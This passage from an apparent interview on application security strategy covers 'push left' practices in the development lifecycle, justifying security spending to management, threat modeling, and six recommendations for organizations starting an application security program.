The solution is to "push left". The ingredients of a typical application development cycle, from left to right, includes the requirements phase, followed by design, then implementation, test, and production. The more effort you put into implementing the right security controls at an earlier tollgate, the lesser it will cost you. For example, assume that a review of security controls during the design phase results in an architect having to re-engineer the authentication mechanism. Now, imagine if this issue was not caught during the design phase, but uncovered during an attack & penetration assessment after the application is in production. It is not trivial to re-engineer a product that is already in production. And it is extremely costly - multiple times costlier.
Black-box assessments, coupled with the right strategy, do have their place. Going back to Gary McGraw's point, they help uncover symptoms. These assessments can be used to further augment and enhance an existing security SDLC process. For example, if you are finding too many issues via black-box assessments during pre-production that you missed to uncover during design and test, then it is time to re-evaluate your SDLC process and approach.
Besides having an excellent technical background, the CSO has to be good at demonstrating a tangible impact of his actions to the management in order to justify security spending. This ability is becoming increasingly important and can take the focus off the main areas of security he should be working on. How can the CSO lighten this load?
Justifying security spend for application security is not difficult. In addition, application security efforts can have positive political side effects for the CSO and the security team. I'll tackle these two points separately. First, application security must tie into the overall IT risk strategy. Start with asking what the company's business goals are, and how you want to demonstrate value. Map these goals to efforts based on risk that will flow into specific tactics that can demonstrate ROI. For example, if your organization currently relies on yearly black-box assessments, calculate the cost of performing the assessments in addition to the cost of remediation. Compare the cost with progress you've made by evaluating the last two assessment results for the same application. Most likely, you will find that you have made little tangible progress in the form of risk reduction and that the remediation cost has been high. Now calculate the cost of investing in a "push left" scenario. Put these two scenarios side by side, and you'll have a solid case for ROI. The returns for a good application strategy are tremendous. The important thing is to continue to measure returns by formulating a good metrics program. Keep track of how security is helping business and technology improve, measure the drop of defects per lines of code, measure the amount of risk reduction. Show value. Demonstrate how your program is embedding security into the organization's DNA.
To my second point, a well thought out application security strategy can help the CSO politically. If you hire the right talent, and approach business and technology with the right attitude, i.e. to enable and not disable, you'll make a lot of new friends. Security departments often complain that the revenue generating business units view them with disapproval, yet the quest for application security is a fantastic opportunity for the security team to work closely with business. Do it right, and the business will love you for it. You will win their credibility and gratitude.
How important is threat modeling?
If you want to do application security right, you've got to invest in threat modeling. The goal of a threat model is to enumerate the malicious entity's goals even if the threats being enumerated have been mitigated. This helps the business, developers, architects, and security analysts understand the real world threats to their applications. Threat modeling should be initiated during the design phase of the application and it should be treated as a living document. As the application development process progresses, the threat model can be further enhanced so it is increasingly valuable. For example, a threat model created during the design phase can be further augmented to map to actual code review results to help developers and architects understand areas they need to improve on and areas where they are doing a good job. Threat modeling is a core component of the push-left strategy, so you eliminate defects as early as possible.
What recommendations would you give to a new organization that is just starting to build an application security strategy?
Once you've derived from your overall business and security goals, it's time to list specifics.
1. Talent and Framework. Hire the right talent and lay the framework: policies, requirements, best practices, and methodologies.
2. Kick start efforts on critical applications. Kick start your efforts on your critical applications: work with business and technology to help them understand the risks to their applications and what they can do to eliminate them as early as possible. Help them invest their by offering advise on their architecture level security controls and threat modeling. Give the development teams guidance on secure coding policies. Assess the code for security defects, followed by a penetration test before the application is turned over to production. Ensure proper application logging mechanisms are built in and monitored.
3. Application portfolio. Come up with a formula to calculate business impact of an application based on key questions. Rank the applications by impact, and assign effort. At this point, you may want to take regulatory requirements into account, most often based on the type of data handled.
4. Invest in training and awareness. The security team, business, and technology must have access to continuous security training. Calculate metrics from code review results to target security training to certain business units. After a code review assessment, get a few of the developers into a room and show them the impact of the vulnerabilities found. Work together to enhance the threat model and possibly fixing the defects. The goal is training, awareness, and knowledge transfer.
5. Metrics. Demonstrate value, for example, a graph showing defects per lines of code decrease within the span of the last few months. Demonstrate risk reduction per business unit which often leads to some healthy competition, and that's a good thing. Overall, you've got to show application risk reduction across the enterprise.
6. Stay cutting edge. Retain talent. Treat your team well. Understand the latest attack vectors. Invest in research. Communicate and support the business - they are your clients and they need your help.